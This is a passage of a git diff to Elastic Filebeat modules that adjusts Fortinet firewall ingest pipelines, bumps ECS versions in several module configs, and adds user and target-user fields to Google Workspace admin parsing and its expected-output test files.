== null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- script: - lang: painless - source: "ctx.network.packets = ctx.source.packets + ctx.destination.packets" - if: "ctx?.source?.packets != null && ctx?.destination?.packets != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" -- append: - field: related.user - value: "{{destination.user.name}}" - if: "ctx.destination?.user?.name != null" - remove: field: - fortinet.firewall.dstport @@ -310,4 +214,4 @@ processors: on_failure: - set: field: error.message - value: '{{ _ingest.on_failure_message }}' \ No newline at end of file + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml index e3df460546ce..a788aa4c8bc4 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/utm.yml @@ -348,93 +348,6 @@ processors: field: fortinet.firewall.filehash target_field: fortinet.file.hash.crc32 ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" - append: field: related.hash value: "{{fortinet.file.hash.crc32}}" diff --git a/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json index 2a485f787f45..172748796d12 100644 --- a/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json +++ b/x-pack/filebeat/module/fortinet/firewall/test/fortinet.log-expected.json @@ -427,6 +427,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.example.com" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -498,9 +501,13 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.example.com" + ], "related.ip": [ "192.168.2.1", - "8.8.8.8" + "8.8.8.8", + "8.8.4.4" ], "rule.category": "Web-based Email", "rule.id": "26", @@ -642,6 +649,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.co" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -704,6 +714,9 @@ "observer.serial_number": "somerouterid", "observer.type": "firewall", "observer.vendor": "Fortinet", + "related.hosts": [ + "elastic.co" + ], "related.ip": [ "192.168.2.1", "8.8.8.8" @@ -864,9 +877,6 @@ "fortinet.firewall.subtype": "vpn", "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", - "fortinet.firewall.vpntunnel": "N/A", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "error", "log.offset": 7112, @@ -934,8 +944,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "elasticvpn", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 7680, @@ -1096,8 +1104,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "testvpn", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 9122, @@ -1198,7 +1204,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.address": "N/A", "destination.as.number": 15169, "destination.as.organization.name": "Google LLC", "destination.geo.continent_name": "North America", @@ -1221,7 +1226,6 @@ ], "fileset.name": "firewall", "fortinet.firewall.action": "ssl-new-con", - "fortinet.firewall.reason": "N/A", "fortinet.firewall.subtype": "vpn", "fortinet.firewall.tunnelid": "2", "fortinet.firewall.tunneltype": "ssl", @@ -1248,7 +1252,6 @@ }, { "@timestamp": "2020-04-23T12:23:47.000-05:00", - "destination.address": "N/A", "destination.as.number": 3356, "destination.as.organization.name": "Level 3 Parent, LLC", "destination.geo.continent_name": "North America", @@ -2005,8 +2008,6 @@ "fortinet.firewall.type": "event", "fortinet.firewall.vd": "root", "fortinet.firewall.vpntunnel": "P1_Test", - "fortinet.firewall.xauthgroup": "N/A", - "fortinet.firewall.xauthuser": "N/A", "input.type": "log", "log.level": "notice", "log.offset": 17123, diff --git a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml index 08b243e6a02f..b4ae86db1ffa 100644 --- a/x-pack/filebeat/module/fortinet/fortimail/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimail/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml index b20b230f1b61..ff232c9266eb 100644 --- a/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml +++ b/x-pack/filebeat/module/fortinet/fortimanager/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/audit/config/input.yml b/x-pack/filebeat/module/gcp/audit/config/input.yml index 80d6fc9c7812..b1ba0148832d 100644 --- a/x-pack/filebeat/module/gcp/audit/config/input.yml +++ b/x-pack/filebeat/module/gcp/audit/config/input.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/firewall/config/input.yml b/x-pack/filebeat/module/gcp/firewall/config/input.yml index 72e6bfaed383..cc914cedfcad 100644 --- a/x-pack/filebeat/module/gcp/firewall/config/input.yml +++ b/x-pack/filebeat/module/gcp/firewall/config/input.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml index aa2649a35985..fbcfc88a79ad 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml @@ -37,4 +37,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index e2e8cd80e3de..8c2c3824ed7e 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js b/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js index 1071a61aef0a..4e9b5630a0d2 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/admin/config/pipeline.js @@ -422,6 +422,17 @@ var login = (function () { } evt.AppendTo("related.user", data[0]); + evt.Put("user.target.name", data[0]); + evt.Put("user.target.domain", data[1]); + evt.Put("user.target.email", email); + var groupName = evt.Get("group.name"); + if (groupName) { + evt.Put("user.target.group.name", groupName); + } + var groupDomain = evt.Get("group.domain"); + if (groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var setEventDuration = function(evt) { diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json index 6e14b17286f2..abd84e262724 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json @@ -55,7 +55,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -112,7 +115,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -169,7 +175,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -224,7 +233,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -275,7 +287,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -325,7 +340,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -375,7 +393,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -426,7 +447,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -476,6 +500,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json index b58fc898aa5d..b2d9d4912151 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -97,7 +100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -150,7 +156,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -200,7 +209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -250,7 +262,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -300,7 +315,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -350,7 +368,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -404,7 +425,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -455,7 +479,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -508,7 +535,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -565,7 +595,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -615,7 +648,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -665,6 +704,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json index fd36d938cfa4..4caec2adf2df 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -145,7 +151,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,6 +211,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json index be4e9edc5471..f81d96a81f14 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json @@ -55,7 +55,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -107,7 +110,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -165,7 +171,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -215,7 +224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -264,7 +276,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -317,7 +332,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -369,7 +387,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -422,7 +443,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -471,7 +495,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -520,7 +547,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -571,7 +601,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -620,7 +653,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -669,7 +705,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -720,7 +759,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -773,7 +815,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -826,7 +871,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -880,7 +928,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -932,7 +983,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -981,7 +1035,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1031,7 +1088,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1085,6 +1145,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json index 7c057be7bfd5..5db40eec65c3 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json @@ -51,6 +51,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json index e38c013ed502..608736f71670 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json @@ -49,7 +49,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +105,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -149,7 +158,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -200,7 +212,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -251,7 +266,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -301,7 +319,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -351,7 +372,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -403,6 +427,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json index 3d9032bcb6cf..fd8de3b21d11 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json @@ -49,7 +49,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -102,7 +108,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -159,6 +171,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json index aedc198aeec8..65e1fe272a7a 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -199,7 +208,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -248,7 +260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -297,7 +312,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -346,7 +364,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -397,7 +418,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -447,7 +471,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -498,7 +525,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -548,7 +578,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +631,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -648,7 +684,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -698,7 +737,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -749,7 +791,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -800,7 +845,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -851,7 +899,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -903,7 +954,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -957,7 +1011,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], 